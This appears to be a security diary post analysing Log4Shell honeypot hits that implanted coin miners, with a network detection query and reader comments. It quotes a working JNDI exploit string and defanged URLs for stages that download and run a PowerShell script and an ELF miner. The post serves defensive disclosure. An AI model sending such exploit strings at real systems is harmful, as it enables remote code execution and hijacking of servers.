Log4Shell exploited to implant coin miners
Last Updated: 2021-12-13 01:31:37 UTC
by Renato Marinho (Version: 1)
Analyzing the ISC honeypots' requests, I found out that coin miners just included Log4Shell into their arsenal.
The request that hit our honeypot is trying to make vulnerable log4j load the address 'jndi:ldap://45[.]83.193.150:1389/Exploit'. This will make log4j load and instantiate a malicious payload hosted at 'http://31[.]220.58.29/Exploit.class'.
I could find the payload address by doing a JNDI lookup, just like log4j does, then getting the class name and address by the returned reference object. To do so, I created a simple tool that is available on GitHub.
After decompiling the malicious class using fernflower, I could see the following code.
Depending on the targeted operating system, the code will download and execute codes hosted on different locations.
At http://172[.]105.241.146:80/wp-content/themes/twentysixteen/s.cmd, which will be loaded in the case of Windows SO, there is a Powershell script to download and execute a coin miner, as seen below.
For not Windows operating systems, the malicious class will download and execute an ELF binary hosted at http://18[.]228.7.109/.log/log. Although I suspect it's also a coin miner, the ELF file is yet to be analyzed.
Bojan and Johannes wrote about Log4Shell here and here, respectively.
Files (MD5 and SHA256 hashes)
Morphus Labs| LinkedIn|Twitter
((dstPort:80 OR dstPort:443 OR dstPort:389 OR dstPort:1389) AND (dstIP:18.104.22.168 OR dstIP:22.214.171.124 OR dstIP:126.96.36.199 OR dstIP:188.8.131.52 OR dstIP:184.108.40.206 dstIP:220.127.116.11 OR dstIP:18.104.22.168 OR dstIP:22.214.171.124 OR dstIP:126.96.36.199 OR dstIP:188.8.131.52 OR dstIP:184.108.40.206 OR dstIP:220.127.116.11)) OR (query:*ryedge.io OR query:*.kryptoslogic-cve-2021-44228.com)
So far, no exploits here or on my friend's network where I've deployed a log server like the one I built for home, but lots and lots of probes.
I've even seen some JNDI stuff in failed logins in ssh logs... (I suppose in the hopes that someone like myself logs all that using vulnerable software)
Dec 13th 2021
1 year ago